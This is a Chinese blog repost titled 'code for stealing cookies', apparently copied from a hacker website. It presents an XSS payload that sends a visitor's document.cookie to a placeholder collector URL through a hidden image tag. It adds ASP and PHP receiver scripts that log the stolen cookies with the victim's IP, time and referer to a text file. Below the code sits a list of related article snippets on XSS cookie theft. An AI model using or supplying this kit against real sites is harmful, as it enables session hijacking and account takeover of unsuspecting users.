盗取cookie的代码

最新推荐文章于 2024-09-02 11:38:53 发布
最新推荐文章于 2024-09-02 11:38:53 发布
阅读量138 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/shanmao/archive/2012/11/25/2787651.html
版权

<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")   
testfile=Server.MapPath("cook.txt")   
set fs=server.CreateObject("scripting.filesystemobject")   
set thisfile=fs.OpenTextFile(testfile,8,True,0)   
thisfile.Writeline(""&msg& "")   
thisfile.close   
set fs = nothing   
%>
news.php代码:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2009-10-21/57206.html

转载于:https://www.cnblogs.com/shanmao/archive/2012/11/25/2787651.html

dgitra7963
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
去掉你代码里的 document.write("<script...
weixin_34387468的博客
09-18 1940
在传统的浏览器中,同步的 script 标签是会阻塞 HTML 解析器的,无论是内联的还是外链的,比如: &lt;script src="a.js"&gt;&lt;/script&gt; &lt;script src="b.js"&gt;&lt;/script&gt; &lt;script src="c.js"&gt;&lt;/script&g
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1178
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
盗取cookie终极代码
weixin_34405925的博客
07-17 272
大家知道xss攻击最有效的方式就是盗取cookie值。通过盗取cookie值可以进入后台从法客搬过来的~ JS: document.write('&lt;script LANGUAGE="Javascript" src="" id="get"&gt;'); function get(url) { var obj = document.getElemen...
js中document.write()用法
热门推荐
04-27 3万+
              var hrf = window.location.href;           if(hrf.indexOf(change)>0){      document.write();               document.write(恭喜发财);      document.write();    }else{    document.write
利用xss偷cookie教学
cnbird's blog
06-24 4585
使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]or="#C0C0C0">COOKIES STEALTHERBy R00T[AT
XSS跨站脚本攻击入门实例--DVWA
chengfangang的专栏
03-03 7215
一、窃取Cookie       对于跨站的攻击方法,使用最多的莫过于cookie窃取了,获取cookie后直接借助“Live http headers、Tamper Data、Gressmonkey (Cookie injector)、Fiddler”等等工具将cookie修改为获取的cookie,这样即可获得权限。成功还有必要因素(同源策略+浏览器+form标签表单) 首先,我们在DVWA
ie7下利用ajax跨域盗取cookie的解决办法
10-30
在IE7浏览器环境下,利用AJAX技术跨域盗取cookie的操作涉及了Web安全性的敏感问题。cookie是服务器为了标识用户身份而存储在用户浏览器中的小文件,通常包含敏感信息,如登录凭证、偏好设置等。跨域问题是指出于安全...
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
xss盗取cookie
07-28
- *1* *2* [xss盗取cookie原理剖析](https://blog.csdn.net/weixin_51692662/article/details/127407078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
XSS攻击实战
qidiandexiaowu
09-20 495
实验环境:kail虚拟机与本机 先来kail里操作一波 ①开启kail的apache服务,开启命令/etc/init.d/apache2 start 第一步成功了! ②进入/var/www/html/里创建新文件cookie.php,命令:sudo touch cookie.php ③再用vi进行编辑,命令sudo vi cookie.php <?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $time = date('Y-
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1892
xss盗取cookie
接收cookie代码与注入盗取cookie代码参考
longger_lee
03-13 2117
document.write('');alert(/XSS/) $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间 $referer=
接收Cookie总结
网络安全。
01-14 3361
0x01 前言 最近总结了一下自己接收cookie的方法,和大家分享一下。来源于平时的积累和良师益友的分享。 0x02 进入正题 一:通过XSS平台接收cookie。 这个相信每个人都用过,是大家接收cookie最常用的一种方式。 1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。 2.在这里我们勾选默认模块,默认模块就是盗取cookie的,然后选择keepsession。 3.然后...
XSS详细解析
Simael的专栏
10-18 1532
转自:http://bbs.pediy.com/showthread.php?p=884009 前言 跨站攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS) 是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种
简单的利用XSS获取用户cookie
shy的博客
10-25 4320
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
简单的cookie盗取
weixin_30940783的博客
02-25 763
此文需要有一定的javascript\html\php方面的只是作为基础 直接上代码: #用于抓取盗窃来的cookiephp文件,此文件需置于攻击者的服务器上,这里包含了两种写法:Method1和Method2 #保存为getCookie.php <?php #Method 1 // $info=getenv("QUERY_STRING"); // if ($...
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7235
【XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
2401_84413795的博客
09-02 474
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板
最新发布
2403_86698467的博客
09-02 483
包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值